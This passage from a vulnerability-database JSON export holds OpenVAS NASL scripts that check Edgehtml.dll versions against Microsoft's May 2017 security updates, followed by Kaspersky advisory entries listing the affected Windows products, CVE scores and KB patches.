PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811110\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0190\", \"CVE-2017-0212\",\n \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0231\",\n \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\",\n \"CVE-2017-0240\", \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\",\n \"CVE-2017-0258\", \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0266\",\n \"CVE-2017-0267\", \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\",\n \"CVE-2017-0271\", \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\",\n \"CVE-2017-0275\", \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\",\n \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98298, 98099, 98102, 98103, 98127, 98139, 98281,\n 98164, 98217, 98173, 98179, 98229, 98234, 98237, 98203, 98208,\n 98108, 98117, 98112, 98113, 98258, 98276, 98259, 98261, 98263,\n 98264, 98265, 98260, 98274, 98266, 98267, 98268, 98270, 98271,\n 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:55:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019473)\");\n\n 
script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019473.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1511 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019473\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.915\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.10586.0 - 11.0.10586.915\\n' ;\n security_message(data:report);\n 
exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:39", "description": "This host is missing a critical/important\n security update according to Microsoft KB4019472.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019472)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0221", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811107", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811107", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019472)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811107\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0212\", \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0221\",\n \"CVE-2017-0222\", \"CVE-2017-0226\", \"CVE-2017-0227\", \"CVE-2017-0228\",\n \"CVE-2017-0229\", \"CVE-2017-0230\", \"CVE-2017-0231\", \"CVE-2017-0233\",\n \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\", \"CVE-2017-0240\",\n \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\", \"CVE-2017-0258\",\n \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0266\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98097, 98298, 98099, 98102, 98103, 98147, 98127,\n 98139, 98281, 98164, 98217, 98222, 98173, 98179, 98229, 98234,\n 98237, 98203, 98208, 98108, 98117, 98112, 98113, 98258, 98276,\n 98259, 98261, 98263, 98264, 98265, 98260, 98274, 98266, 98267,\n 98268, 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:54:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n 
script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019472)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019472.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019472\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1197\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' 
+ edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1197\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:21", "description": "This host is missing a critical security\n update according to Microsoft Security update KB4016871.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4016871)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0235", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0224", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811108", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4016871)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811108\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0212\", \"CVE-2017-0213\",\n \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0224\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0230\",\n \"CVE-2017-0231\", \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0235\",\n \"CVE-2017-0236\", \"CVE-2017-0238\", \"CVE-2017-0240\", \"CVE-2017-0241\",\n \"CVE-2017-0246\", \"CVE-2017-0248\", \"CVE-2017-0258\", \"CVE-2017-0259\",\n \"CVE-2017-0263\", \"CVE-2017-0266\", \"CVE-2017-0267\", \"CVE-2017-0268\",\n \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\", \"CVE-2017-0272\",\n \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\", \"CVE-2017-0276\",\n \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98099, 98102, 98103, 98127, 98214, 98139, 98281,\n 98164, 98217, 98222, 98173, 98179, 98229, 98230, 98234, 98237,\n 98203, 98208, 98108, 98117, 98112, 98113, 98258, 98276, 98259,\n 98261, 98263, 98264, 98265, 98260, 98274, 98266, 98267, 98268,\n 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:52:53 +0530 (Wed, 10 May 2017)\");\n 
script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4016871)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security update KB4016871.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue with Surface Hub devices waking from sleep approximately\n every four minutes after the first two hours.\n\n - Addressed issue where autochk.exe can randomly skip drive checks and not fix\n corruptions, which may lead to data loss.\n\n - Addressed an issue where Microsoft Edge users in networking environments that\n do not fully support the TCP Fast Open standard may have problems connecting\n to some websites. Users can re-enable TCP Fast Open in about:flags.\n\n - Addressed issues with Arc Touch mouse Bluetooth connectivity.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, cause a host\n machine to crash, spoof content and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4016871\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4016871\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.295\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.295\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-01-19T15:06:09", "description": "### *Detect date*:\n05/09/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Support Update). 
Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, cause denial of service, bypass security restrictions, gain privileges.\n\n### *Affected products*:\nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 for 32-bit Systems \nInternet Explorer 9 \nWindows 10 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2012 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nInternet Explorer 11 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2016 \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows RT 8.1 \nWindows 10 Version 1703 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nMicrosoft Edge (EdgeHTML-based) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nInternet Explorer 10 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0220>) 
\n[CVE-2017-0222](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0222>) \n[CVE-2017-0280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0280>) \n[CVE-2017-0064](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0064>) \n[CVE-2017-0272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0272>) \n[CVE-2017-0246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0246>) \n[CVE-2017-0278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0278>) \n[CVE-2017-0279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0279>) \n[CVE-2017-0190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0190>) \n[CVE-2017-0214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0214>) \n[CVE-2017-0273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0273>) \n[CVE-2017-0270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0270>) \n[CVE-2017-0271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0271>) \n[CVE-2017-0276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0276>) \n[CVE-2017-0277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0277>) \n[CVE-2017-0274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0274>) \n[CVE-2017-0213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0213>) \n[CVE-2017-0238](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0238>) \n[CVE-2017-0258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0258>) \n[CVE-2017-0077](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0077>) 
\n[CVE-2017-0175](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0175>) \n[CVE-2017-0171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0171>) \n[CVE-2017-0269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0269>) \n[CVE-2017-0268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0268>) \n[CVE-2017-0245](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0245>) \n[CVE-2017-0244](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0244>) \n[CVE-2017-0242](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0242>) \n[CVE-2017-0263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0263>) \n[CVE-2017-0275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0275>) \n[CVE-2017-0267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0267>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-0238](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0238>)7.6Critical \n[CVE-2017-0222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0222>)7.6Critical \n[CVE-2017-0064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0064>)4.3Warning \n[CVE-2017-0280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280>)7.1High \n[CVE-2017-0279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279>)6.8High \n[CVE-2017-0278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278>)6.8High \n[CVE-2017-0277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277>)6.8High \n[CVE-2017-0276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276>)4.3Warning 
\n[CVE-2017-0275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275>)4.3Warning \n[CVE-2017-0274](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0274>)4.3Warning \n[CVE-2017-0273](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0273>)4.3Warning \n[CVE-2017-0272](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0272>)9.3Critical \n[CVE-2017-0271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0271>)4.3Warning \n[CVE-2017-0270](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0270>)4.3Warning \n[CVE-2017-0269](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0269>)4.3Warning \n[CVE-2017-0268](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0268>)4.3Warning \n[CVE-2017-0267](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0267>)4.3Warning \n[CVE-2017-0263](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0263>)7.2High \n[CVE-2017-0258](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0258>)1.9Warning \n[CVE-2017-0246](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0246>)6.9High \n[CVE-2017-0245](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0245>)1.9Warning \n[CVE-2017-0244](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0244>)6.9High \n[CVE-2017-0242](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0242>)4.3Warning \n[CVE-2017-0220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0220>)1.9Warning \n[CVE-2017-0214](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0214>)4.4Warning \n[CVE-2017-0213](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0213>)1.9Warning \n[CVE-2017-0190](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0190>)2.1Warning \n[CVE-2017-0175](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0175>)2.1Warning \n[CVE-2017-0171](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0171>)4.3Warning 
\n[CVE-2017-0077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0077>)7.2High\n\n### *Exploitation*:\nThe following public exploits exist for this vulnerability:\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[4018271](<http://support.microsoft.com/kb/4018271>) \n[4019264](<http://support.microsoft.com/kb/4019264>) \n[4019263](<http://support.microsoft.com/kb/4019263>) \n[4019149](<http://support.microsoft.com/kb/4019149>) \n[4018885](<http://support.microsoft.com/kb/4018885>) \n[4019206](<http://support.microsoft.com/kb/4019206>) \n[4018821](<http://support.microsoft.com/kb/4018821>) \n[4018927](<http://support.microsoft.com/kb/4018927>) \n[4018556](<http://support.microsoft.com/kb/4018556>) \n[4019204](<http://support.microsoft.com/kb/4019204>) \n[4018466](<http://support.microsoft.com/kb/4018466>) \n[4018196](<http://support.microsoft.com/kb/4018196>)", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T00:00:00", "type": "kaspersky", "title": "KLA11077 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", 
"CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0238", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-01-18T00:00:00", "id": "KLA11077", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11077/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T11:18:04", "description": "### *Detect date*:\n05/09/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, execute arbitrary code, gain privileges.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 